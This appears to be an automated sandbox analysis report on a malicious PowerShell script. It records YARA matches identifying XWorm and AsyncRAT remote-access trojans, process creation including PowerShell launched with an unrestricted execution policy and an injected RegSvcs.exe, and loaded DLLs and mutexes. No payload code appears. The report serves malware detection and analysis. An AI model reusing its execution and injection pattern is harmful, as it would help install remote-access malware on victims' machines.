            Source: powershell.exe, 00000000.00000002.2168812433.0000021C4A288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000000.00000002.2168812433.0000021C4A061000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4568648694.0000000002AB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Amcache.hve.0.drString found in binary or memory: http://upx.sf.net
            Source: powershell.exe, 00000000.00000002.2168812433.0000021C4A288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000000.00000002.2168812433.0000021C4A061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000000.00000002.2187842914.0000021C5A2FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000000.00000002.2187842914.0000021C5A2FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000000.00000002.2187842914.0000021C5A2FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000000.00000002.2168812433.0000021C4A288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000000.00000002.2168812433.0000021C4A4DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000000.00000002.2168812433.0000021C4B438000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2187842914.0000021C5A2FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 0.2.powershell.exe.21c4a460438.2.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.powershell.exe.21c4a460438.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.powershell.exe.21c4b279478.3.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.powershell.exe.21c4b279478.3.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.powershell.exe.21c4a460438.2.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.powershell.exe.21c4a460438.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.powershell.exe.21c4b279478.3.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.powershell.exe.21c4b279478.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000003.00000002.4565884702.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000002.2168812433.0000021C4A288000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000002.2168812433.0000021C4AEDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000002.2168812433.0000021C4A4DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess Stats: CPU usage > 49%
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34882EFA0_2_00007FFD34882EFA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34885F280_2_00007FFD34885F28
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34883E650_2_00007FFD34883E65
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD3488A7690_2_00007FFD3488A769
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD3488EFD80_2_00007FFD3488EFD8
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348840FA0_2_00007FFD348840FA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348899070_2_00007FFD34889907
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348862390_2_00007FFD34886239
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348851B00_2_00007FFD348851B0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34887A740_2_00007FFD34887A74
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0288C2D83_2_0288C2D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_028863403_2_02886340
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_028884B83_2_028884B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0288B5983_2_0288B598
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02885A703_2_02885A70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_028857283_2_02885728
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02880FA03_2_02880FA0
            Source: 0.2.powershell.exe.21c4a460438.2.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.powershell.exe.21c4a460438.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.powershell.exe.21c4b279478.3.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.powershell.exe.21c4b279478.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.powershell.exe.21c4a460438.2.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.powershell.exe.21c4a460438.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.powershell.exe.21c4b279478.3.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.powershell.exe.21c4b279478.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000003.00000002.4565884702.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000002.2168812433.0000021C4A288000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000002.2168812433.0000021C4AEDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000002.2168812433.0000021C4A4DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: classification engineClassification label: mal100.troj.evad.winPS1@6/9@1/1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
            Source: C:\Windows\System32\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7124:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2788:120:WilError_03
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\eBzUWjdTcEaHqPrC
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rypfwt53.3kj.ps1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
            Source: 92.255.57_1.112.ps1Virustotal: Detection: 18%
            Source: 92.255.57_1.112.ps1ReversingLabs: Detection: 13%
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57_1.112.ps1"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3728" "2668" "2508" "2672" "0" "0" "2676" "0" "0" "0" "0" "0"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3728" "2668" "2508" "2672" "0" "0" "2676" "0" "0" "0" "0" "0" Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wer.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: aepic.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: flightsettings.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.2168812433.0000021C4A288000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2168693034.0000021C49C80000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.2168812433.0000021C4AEDB000.00000004.00000800.00020000.00000000.sdmp
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD3488D5CE push 69FFFFFFh; iretd 0_2_00007FFD3488D5D3
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD3488302F push eax; retf 0_2_00007FFD3488303D
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34880953 push E95A8BD0h; ret 0_2_00007FFD348809C9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02888080 push eax; iretd 3_2_02888081
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02884CC8 pushad ; retf 3_2_02884CD1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
